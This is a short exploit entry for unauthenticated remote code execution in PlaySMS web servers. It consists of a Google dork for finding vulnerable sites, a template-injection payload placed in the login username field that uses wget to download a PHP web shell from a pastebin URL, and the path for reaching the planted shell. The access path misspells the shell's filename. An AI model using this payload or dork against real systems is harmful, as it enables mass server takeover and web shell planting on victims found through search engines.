# Exploit Title : PlaySMS Unauthenticated Remote Code Execution Shell Upload
# Date : 2020-04-28
# Author [ Discovered By ] : LinuXploit
# Google Dork : inurl:?app=main intitle:sms
# Category : WebApps
# Exploit Risk : High
# Tested On : Windows 10 / Linux
#RCE Payload : {{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}
#Describe :
- Go Dorking
- If you found site with admin login, put RCE payload on username ( remember !! only on username !! )
- access shell : http://target/linuxplot.php Or http://target/[PATH]/linuxplot.php